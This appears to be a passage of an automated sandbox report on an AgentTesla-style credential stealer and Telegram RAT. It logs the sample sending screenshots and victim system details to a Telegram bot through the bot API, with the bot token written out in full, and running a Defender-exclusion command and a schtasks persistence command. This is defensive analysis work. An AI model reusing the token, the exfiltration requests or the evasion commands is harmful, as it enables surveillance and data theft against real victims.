                                                                  2024-04-19 17:36:42 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 61 64 39 66 36 66 35 37 34 39 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc91ad9f6f5749--
                                                                  2024-04-19 17:36:42 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:42 UTC | 1482 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:42 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3453,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548202,"document":{"file_name":"user-618321 2024-06-21 04-50-07.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg19ZiKrqrAZRY24NOjh2I2hO8nVS4QAAsEXAAKLUhlRQczAxVjWXYYBAAdtAAM0BA","file_unique_id":"AQADwRcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg19ZiKrqrAZRY24NOjh2I2hO8nVS4QAAsEXAAKLUhlRQczAxVjWXYYBAAdtAAM0BA","file_unique_id":"AQADwRcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINfWYiq6qwGUWNuDTo4diNoTvJ1UuEAALBFwACi1IZUUHMwMVY1l2GNAQ","file_unique_id":"AgADwRcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/21/2024 04:40:07\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  22 | 192.168.2.5 | 49737 | 149.154.167.220 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:36:50 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc94e8357314fa
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:36:50 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 34 65 38 33 35 37 33 31 34 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 34 65 38 33 35 37 33 31 34 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 35 2f 32 30 32 34 20 30 37 3a 32 31 3a 35 39 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc94e8357314faContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc94e8357314faContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/25/2024 07:21:59User
                                                                  2024-04-19 17:36:50 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:50 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:50 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  2024-04-19 17:36:50 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:51 UTC | 1482 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:51 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3454,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548211,"document":{"file_name":"user-618321 2024-06-25 07-27-02.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1-ZiKrs-rdP2z2EJl-dBDvOQy5_8EAAsIXAAKLUhlRi8E5n3rp5YkBAAdtAAM0BA","file_unique_id":"AQADwhcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1-ZiKrs-rdP2z2EJl-dBDvOQy5_8EAAsIXAAKLUhlRi8E5n3rp5YkBAAdtAAM0BA","file_unique_id":"AQADwhcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINfmYiq7Pq3T9s9hCZfnQQ7zkMuf_BAALCFwACi1IZUYvBOZ966eWJNAQ","file_unique_id":"AgADwhcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/25/2024 07:21:59\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7324 | Process: C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:36:55 UTC | 238 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc8528d0ad5c27
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:56 UTC | 1024 | OUT | Data Ascii: -----------------------------8dc8528d0ad5c27Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc8528d0ad5c27Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/05/2024 06:19:11User
                                                                  2024-04-19 17:36:56 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:56 UTC | 1482 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:56 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3455,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548216,"document":{"file_name":"user-618321 2024-06-05 06-29-12.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1_ZiKruCROdQkRW_TgmgauSUCs-AEAAsMXAAKLUhlRmgoo-q5sjo8BAAdtAAM0BA","file_unique_id":"AQADwxcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1_ZiKruCROdQkRW_TgmgauSUCs-AEAAsMXAAKLUhlRmgoo-q5sjo8BAAdtAAM0BA","file_unique_id":"AQADwxcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINf2Yiq7gkTnUJEVv04JoGrklArPgBAALDFwACi1IZUZoKKPqubI6PNAQ","file_unique_id":"AgADwxcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/05/2024 06:19:11\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 49739 | Destination IP: 149.154.167.220 | Destination Port: 443
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:37:12 UTC | 238 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc60a81bbe05f3
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67151
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:37:12 UTC | 1024 | OUT | Data Ascii: -----------------------------8dc60a81bbe05f3Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc60a81bbe05f3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/19/2024 19:37:11User
                                                                  2024-04-19 17:37:12 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:37:13 UTC | 1482 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:37:13 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3456,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548233,"document":{"file_name":"user-618321 2024-04-19 19-37-11.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg2AZiKrybobC6ULtXlzrBACSc0Ks28AAsQXAAKLUhlRJbjNWIWHTcMBAAdtAAM0BA","file_unique_id":"AQADxBcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg2AZiKrybobC6ULtXlzrBACSc0Ks28AAsQXAAKLUhlRJbjNWIWHTcMBAAdtAAM0BA","file_unique_id":"AQADxBcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINgGYiq8m6GwulC7V5c6wQAknNCrNvAALEFwACi1IZUSW4zViFh03DNAQ","file_unique_id":"AgADxBcAAotSGVE","file_size":66528},"caption":"New SC Recovered!\n\nTime: 04/19/2024 19:37:11\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 49740 | Destination IP: 149.154.167.220 | Destination Port: 443
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:37:12 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc60a81bbe05f3
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67151
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:37:12 UTC | 1024 | OUT | Data Ascii: -----------------------------8dc60a81bbe05f3Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc60a81bbe05f3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/19/2024 19:37:11User
                                                                  2024-04-19 17:37:13 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:37:13 UTC | 1485 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:37:13 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1096
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3457,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548233,"document":{"file_name":"user-618321 2024-04-19 19-37-11.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg2BZiKryenFMv5U91fk_nGrBLzhTKoAAsUXAAKLUhlRHxsM4E3qAAHHAQAHbQADNAQ","file_unique_id":"AQADxRcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg2BZiKryenFMv5U91fk_nGrBLzhTKoAAsUXAAKLUhlRHxsM4E3qAAHHAQAHbQADNAQ","file_unique_id":"AQADxRcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINgWYiq8npxTL-VPdX5P5xqwS84UyqAALFFwACi1IZUR8bDOBN6gABxzQE","file_unique_id":"AgADxRcAAotSGVE","file_size":66528},"caption":"New SC Recovered!\n\nTime: 04/19/2024 19:37:11\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Target ID:0
                                                                  Start time:19:33:01
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\z1E-catalogSamples.exe"
                                                                  Imagebase:0xc00000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                                                                  Imagebase:0x9a0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"
                                                                  Imagebase:0x8c0000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\z1E-catalogSamples.exe"
                                                                  Imagebase:0xd90000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:19:33:04
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Imagebase:0xd60000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 71%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:19:33:04
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff6ef0c0000
                                                                  File size:496'640 bytes
                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:19:33:07
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp"
                                                                  Imagebase:0x8c0000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:19:33:07
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:19:33:07
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                                                                  Imagebase:0x350000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:19:33:07
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                                                                  Imagebase:0xcc0000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                    • Instruction ID: 23d639a760eb4f8fecec269fee46c302661f90a134e700b6a97390f1a8867e1f
                                                                    • Opcode Fuzzy Hash: 5ec2778ab18571c7fa3539424ce003f3fc2dd9960a141304461d903da971885e
                                                                    • Instruction Fuzzy Hash: 5A210371604244DFCB05CF98C5C0B26BFA5FB8832CF24C569DA0D0BA53D33AD806CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100425331.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
